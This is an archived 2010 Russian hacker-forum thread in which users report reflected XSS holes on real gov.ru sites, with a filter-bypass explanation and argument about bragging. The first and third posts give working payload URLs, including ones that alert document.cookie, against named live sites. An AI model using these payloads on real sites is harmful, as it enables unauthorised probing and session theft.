Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

XSS в правительствином домене gov.ru

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> XSS в правительствином домене gov.ru
Имя
Сообщение << Старые топики   Новые топики >>
XSS в правительствином домене gov.ru - 2010-05-01 10:46:51.980000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Честно говоря и пишу Я в отдельный топ потому, что я слегка под впечатлением от найденной мной xxs-ки.
Я не стал постить в соседней теме: "Ваши XSS на популярных сайтах."еще и, потому что хочу услышать мнение форумчан на эту тему, собсно меня на поиски в столь важном для Страны домене подтолкнул Паша, который в Теме про sql иньекты раскручивал что-то в gov домене. (Я не смог удержаться от соблазна найти что-то свое…).

А че я хожу вокруг да около вот она родимая:
http://www.ach.gov.ru/ru/search/?q=%22%3E%3Cscript%3Ealert%28%27by+Spam+from+%EA%F1%E0%EA%E5%EF%27%29%3C%2Fscript%3E&test3432242=0&match=&in=&time%5B%5D=created&interval%5B%5D=&periodbegin%5B%5D=%E4%E4+%2F+%EC%EC+%2F+%E3%E3%E3%E3&periodfinish%5B%5D=%E4%E4+%2F+%EC%EC+%2F+%E3%E3%E3%E3&time%5B%5D=created&interval%5B%5D=&periodbegin%5B%5D=%E4%E4+%2F+%EC%EC+%2F+%E3%E3%E3%E3&periodfinish%5B%5D=%E4%E4+%2F+%EC%EC+%2F+%E3%E3%E3%E3&onpage=5

XSS пассивная, её смысл в том что, если в строку поиска забить ">&lt;script&gt;alert('By Spam from ксакеп')&lt;/script&gt; и запустить поиск по ресурсу, то можно увидеть веселый алерт с месагой аля: By Spam from ксакеп Что характерно, "классика" &lt;script&gt;alert('olololo')&lt;/script&gt; фильтруется на "Ура". Почему админы и кодеры допустили столь большую оплошность- отфильтровав "классику" и забыв про элементарный её обход, Мы с Вами не узнаем, но мне хочется узнать ваше мнение на этот счет…

PS Я ни кода раньше не писал столь большие посты тем более о взломе, не судите строго…

PPS С первым мая вас форумчане!!!!!!!!!!!
Post #: 1
RE: XSS в правительствином домене gov.ru - 2010-05-01 11:09:05.583333   
heretic1990

Сообщений: 109
Оценки: 0
Присоединился: 2010-04-23 14:59:34.120000
не вижу в этом ничего особенного, ну и что, что домен в правительственной зоне. над сайтом работают такие же люди как мы, которым свойственно ошибаться.
Post #: 2
RE: XSS в правительствином домене gov.ru - 2010-05-01 17:05:51.656666   
heretic1990

Сообщений: 109
Оценки: 0
Присоединился: 2010-04-23 14:59:34.120000
15 мин поиски и вот результат:

http://www.minprom.gov.ru/search/extended?s=1&date_search="&gt;&lt;sсriрt&gt;alert(document.cookie)&lt;/sсriрt&gt; http://www.fasi.gov.ru/subscribe/?action=subscribe&email=%22%3E%3Csсriрt%3Ealert%28document.cookie%29%3C%2Fsсriрt%3E
Post #: 3
RE: XSS в правительствином домене gov.ru - 2010-05-02 19:01:15.870000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Гмм я когда говорил "мнение форумчан", я имел в виду именно форучан,а не всяких… с 30 постами… и сомнительной репутацией((((
И уж тем более не никак не хотел показать себя кульхацкером, кем себя выставляет человек с ником на "ХЭ"…
Одно дело когда находишь это на сайте в домене аля: "Зимбабве", и совсем другое когда это почти под боком…
Post #: 4
RE: XSS в правительствином домене gov.ru - 2010-05-02 19:43:26.320000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
С помощью xss? Шел?8|
Post #: 5
RE: XSS в правительствином домене gov.ru - 2010-05-02 21:40:54.320000   
heretic1990

Сообщений: 109
Оценки: 0
Присоединился: 2010-04-23 14:59:34.120000
Sрam, репутация на форуме это ничто, главное репутация самой личности в целом, как человека. И своими высказываниями ты показываешь своё безкультурие и не умение принимать критику. Я вот сегодня например нашел скулю на одном из сайтов с доменом *.gov.ru, но я же не побежал на форум и не стал хвалиться "какой я кулхацкер".
Post #: 6
RE: XSS в правительствином домене gov.ru - 2010-05-02 22:27:55.320000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Я щас хвалюсь?8|
ЗЫ Ты наверно просто моего первого поста не дочитал… я как раз об обратном говорю…
Post #: 7
Страниц:  [1]
Все форумы >> [Уязвимости] >> XSS в правительствином домене gov.ru







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.